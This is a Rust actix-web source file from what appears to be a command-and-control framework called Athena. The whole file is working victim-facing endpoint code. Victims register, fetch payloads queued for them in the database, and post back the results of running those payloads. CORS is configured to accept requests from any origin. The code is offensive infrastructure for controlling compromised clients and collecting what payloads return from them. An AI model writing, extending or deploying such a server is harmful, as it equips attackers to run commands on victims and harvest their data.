1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105

/*
 * Copyright (C) 2021  Aravinth Manivannan <realaravinth@batsense.net>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Affero General Public License as
 * published by the Free Software Foundation, either version 3 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Affero General Public License for more details.
 *
 * You should have received a copy of the GNU Affero General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */
use actix_identity::Identity;
use actix_web::{web, HttpResponse, Responder};
use libathena::payload::victim::*;

use crate::errors::*;
use crate::AppData;

pub fn services(cfg: &mut actix_web::web::ServiceConfig) {
    use actix_web::*;
    let cors = actix_cors::Cors::default()
        .allow_any_origin()
        .allowed_methods(vec!["POST"])
        .allow_any_header()
        .max_age(3600)
        .send_wildcard();

    cfg.service(
        Scope::new(crate::V1_ROUTES.victim.scope)
            .wrap(cors)
            .service(join)
            .service(payload_response)
            .service(get_payload),
    );
}

#[my_codegen::post(
    path = "crate::V1_ROUTES.victim.join.strip_prefix(crate::V1_ROUTES.victim.scope).unwrap()"
)]
async fn join(data: AppData, id: Identity) -> ServiceResult<impl Responder> {
    super::join_rnner(&id, &data).await?;
    Ok(HttpResponse::Ok())
}

#[my_codegen::post(
    path = "crate::V1_ROUTES.victim.get_payload.strip_prefix(crate::V1_ROUTES.victim.scope).unwrap()"
)]
async fn get_payload(data: AppData, id: Identity) -> ServiceResult<impl Responder> {
    super::join_rnner(&id, &data).await?;

    let name = id.identity().unwrap();

    let payload = sqlx::query_as!(
        Payload,
        "SELECT id, payload_type, payload 
        FROM cic_messages 
        WHERE 
            victim_id = (SELECT ID from cic_victims WHERE name = $1)
        AND response IS NULL",
        &name
    )
    .fetch_all(&data.db)
    .await?;

    let mut resp = PayloadCollection {
        payloads: Vec::new(),
    };
    if !payload.is_empty() {
        resp.payloads = payload;
    }

    Ok(HttpResponse::Ok().json(resp))
}

#[my_codegen::post(
    path = "crate::V1_ROUTES.victim.payload_response.strip_prefix(crate::V1_ROUTES.victim.scope).unwrap()"
)]
async fn payload_response(
    data: AppData,
    payload: web::Json<PayloadResult>,
    id: Identity,
) -> ServiceResult<impl Responder> {
    super::join_rnner(&id, &data).await?;

    let name = id.identity().unwrap();

    sqlx::query!(
        "UPDATE cic_messages SET response = $1
        WHERE 
            id = $2
        AND 
            victim_id = (SELECT ID from cic_victims WHERE name = $3)",
        &payload.response,
        &payload.id,
        &name
    )
    .execute(&data.db)
    .await?;
    Ok(HttpResponse::Ok())
}